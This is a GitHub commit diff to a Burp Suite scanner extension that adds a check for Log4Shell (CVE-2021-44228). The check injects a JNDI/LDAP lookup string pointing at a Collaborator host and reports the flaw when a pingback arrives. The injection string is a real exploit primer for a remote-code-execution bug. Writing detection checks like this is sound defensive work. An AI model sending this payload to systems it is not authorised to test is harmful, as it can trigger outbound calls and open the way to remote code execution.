Skip to content

Commit b485a07

Browse files
albinowaxalbinowax
authored
Detect Log4Shell
1 parent 9eea075 commit b485a07

File tree

1 file changed

+21
-1
lines changed

1 file changed

+21
-1
lines changed

activeScan++.py

Lines changed: 21 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -31,7 +31,7 @@
3131
except ImportError:
3232
print "Failed to load dependencies. This issue may be caused by using the unstable Jython 2.7 beta."
3333

34-
VERSION = "1.0.22"
34+
VERSION = "1.0.23"
3535
FAST_MODE = False
3636
DEBUG = False
3737
callbacks = None
@@ -69,6 +69,7 @@ def registerExtenderCallbacks(self, this_callbacks):
6969
callbacks.registerScannerCheck(SimpleFuzz())
7070
callbacks.registerScannerCheck(EdgeSideInclude())
7171
if collab_enabled:
72+
callbacks.registerScannerCheck(Log4j())
7273
callbacks.registerScannerCheck(Solr())
7374
callbacks.registerScannerCheck(doStruts_2017_12611_scan())
7475

@@ -713,6 +714,25 @@ def consolidateDuplicateIssues(self, existingIssue, newIssue):
713714
return is_same_issue(existingIssue, newIssue)
714715

715716

717+
class Log4j(IScannerCheck):
718+
def doActiveScan(self, basePair, insertionPoint):
719+
collab = callbacks.createBurpCollaboratorClientContext()
720+
attack = request(basePair, insertionPoint, "${jndi:ldap://"+collab.generatePayload(True)+"/a}")
721+
interactions = collab.fetchAllCollaboratorInteractions()
722+
if interactions:
723+
return [CustomScanIssue(attack.getHttpService(), helpers.analyzeRequest(attack).getUrl(), [attack],
724+
'Log4Shell (CVE-2021-44228)',
725+
"The application appears to be running a version of log4j vulnerable to RCE. ActiveScan++ sent a reference to an external file, and received a pingback from the server.<br/><br/>" +
726+
"To investigate, use the manual collaborator client. It may be possible to escalate this vulnerability into RCE. Please refer to https://www.lunasec.io/docs/blog/log4j-zero-day/ for further information",
727+
'Firm', 'High')]
728+
729+
def doPassiveScan(self, basePair):
730+
return []
731+
732+
def consolidateDuplicateIssues(self, existingIssue, newIssue):
733+
return is_same_issue(existingIssue, newIssue)
734+
735+
716736
class Solr(IScannerCheck):
717737
def doActiveScan(self, basePair, insertionPoint):
718738
collab = callbacks.createBurpCollaboratorClientContext()

0 commit comments

Comments
 (0)